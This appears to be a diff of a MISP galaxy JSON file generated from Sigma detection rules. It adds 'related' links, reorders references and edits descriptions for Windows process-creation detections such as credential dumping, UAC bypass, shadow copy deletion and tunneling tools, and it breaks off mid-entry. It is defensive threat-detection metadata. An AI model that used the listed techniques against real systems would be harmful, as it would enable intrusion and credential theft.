"https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" ], "tags": [ @@ -42268,11 +54252,20 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41421f44-58f9-455d-838a-c398859841d4", "value": "ETW Logging Tamper In .NET Processes" }, { - "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2022/09/06", @@ -42292,8 +54285,17 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "value": "Potential WinAPI Access Via CommandLine" + "value": "Potential WinAPI Calls Via CommandLine" }, { "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", @@ -42316,6 +54318,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9494479d-d994-40bf-a8b1-eea890237021", "value": "Suspicious Add Scheduled Task Parent" }, @@ -42341,6 +54352,15 @@ "car.2013-08-001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" }, @@ -42357,8 +54377,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" ], "tags": [ @@ -42366,6 +54386,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", "value": "Trickbot Malware Recon Activity" }, @@ -42413,6 +54442,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93199800-b52a-4dec-b762-75212c196542", "value": "RunXCmd Tool Execution As System" }, @@ -42429,8 +54467,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/990758590020452353", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://twitter.com/pabraeken/status/990758590020452353", "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], @@ -42439,6 +54477,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" }, @@ -42467,6 +54514,29 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", "value": "Koadic Execution" }, @@ -42491,6 +54561,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "value": "Disable Windows IIS HTTP Logging" }, @@ -42515,6 +54594,15 @@ "attack.t1217" ] }, + "related": [ + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", "value": "Suspicious Where Execution" }, @@ -42532,8 +54620,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://curl.se/docs/manpage.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", + "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" ], "tags": [ @@ -42541,6 +54629,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60", "value": "Suspicious Curl Change User Agents" }, @@ -42565,6 +54662,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "value": "Windows Credential Manager Access via VaultCmd" }, @@ -42605,8 +54711,8 @@ "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" ], "tags": [ @@ -42616,6 +54722,22 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "value": "SOURGUM Actor Behaviours" }, @@ -42632,8 +54754,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" ], "tags": [ @@ -42641,6 +54763,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" }, @@ -42657,9 +54788,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/vysecurity/status/974806438316072960", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", - "https://twitter.com/vysecurity/status/974806438316072960", "https://twitter.com/vysecurity/status/873181705024266241", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" ], @@ -42668,6 +54799,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", "value": "Capture Credentials with Rpcping.exe" }, @@ -42694,6 +54834,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "value": "Renamed CreateDump Process Dump" }, @@ -42710,8 +54859,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ @@ -42720,6 +54869,22 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" }, @@ -42736,9 +54901,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", - "https://github.com/jpillora/chisel/", "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", + "https://github.com/jpillora/chisel/", + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" ], "tags": [ @@ -42746,6 +54911,15 @@ "attack.t1090.001" ] }, + "related": [ + { + "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "value": "Chisel Tunneling Tool Usage" }, @@ -42770,6 +54944,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "value": "Impacket Tool Execution" }, @@ -42810,8 +54993,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" ], "tags": [ @@ -42843,6 +55026,15 @@ "attack.t1567" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", "value": "Suspicious ConfigSecurityPolicy Execution" }, @@ -42859,8 +55051,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", "https://www.youtube.com/watch?v=Ie831jF0bb0", + "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" ], "tags": [ @@ -42870,6 +55062,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "value": "Process Access via TrolleyExpress Exclusion" }, @@ -42886,9 +55094,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" ], "tags": [ @@ -42921,6 +55129,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "value": "Bypass UAC via Fodhelper.exe" }, @@ -42945,6 +55162,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", "value": "NPS Tunneling Tool" }, @@ -42970,6 +55196,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "value": "Dumpert Process Dumper" }, @@ -43020,6 +55255,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", "value": "Invoke-Obfuscation RUNDLL LAUNCHER" }, @@ -43044,6 +55288,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", "value": "Suspicious Dosfuscation Character in Commandline" }, @@ -43068,6 +55321,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "value": "Discover Private Keys" }, @@ -43093,6 +55355,15 @@ "attack.t1556.002" ] }, + "related": [ + { + "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", "value": "Dropping Of Password Filter DLL" }, @@ -43120,6 +55391,22 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "value": "Turla Group Commands May 2020" }, @@ -43144,6 +55431,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", "value": "Net WebClient Casing Anomalies" }, @@ -43168,6 +55464,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "value": "Suspicious Rundll32 Activity Invoking Sys File" }, @@ -43209,8 +55514,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml" ], "tags": [ @@ -43218,6 +55523,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "value": "File Download Using ProtocolHandler.exe" }, @@ -43242,13 +55556,22 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "value": "Add User to Local Administrators" }, { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) viq CommandLine", "meta": { - "author": "James Pemberton / @4A616D6573", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "creation_date": "2019/10/24", "falsepositive": [ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." @@ -43259,6 +55582,7 @@ "logsource.product": "windows", "refs": [ "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" ], @@ -43267,6 +55591,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "value": "Usage Of Web Request Commands And Cmdlets" }, @@ -43291,6 +55624,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "value": "Winrar Compressing Dump Files" }, @@ -43307,10 +55649,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" ], "tags": [ @@ -43320,6 +55662,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", "value": "Emotet Process Creation" }, @@ -43337,8 +55688,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" ], @@ -43348,6 +55699,15 @@ "attack.t1087.002" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "value": "Suspicious Reconnaissance Activity Using Net" }, @@ -43374,6 +55734,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher" }, @@ -43424,6 +55793,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", "value": "WMI Spawning Windows PowerShell" }, @@ -43452,6 +55837,22 @@ "attack.t1114" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "25676e10-2121-446e-80a4-71ff8506af47", "value": "Exchange PowerShell Snap-Ins Usage" }, @@ -43477,6 +55878,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", "value": "UAC Bypass Using DismHost" }, @@ -43503,6 +55913,15 @@ "attack.s0040" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "value": "Htran or NATBypass Markers" }, @@ -43528,6 +55947,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "value": "Suspicious Execution of Shutdown to Log Out" }, @@ -43544,9 +55972,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ @@ -43554,6 +55982,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", "value": "Verclsid.exe Runs COM Object" }, @@ -43570,8 +56007,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", "https://ss64.com/nt/mklink.html", + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_create_link_osk_cmd.yml" ], "tags": [ @@ -43607,6 +56044,29 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", "value": "Command Line Execution with Suspicious URL and AppData Strings" }, @@ -43664,6 +56124,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", "value": "Squirrel Lolbin" }, @@ -43681,9 +56150,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", - 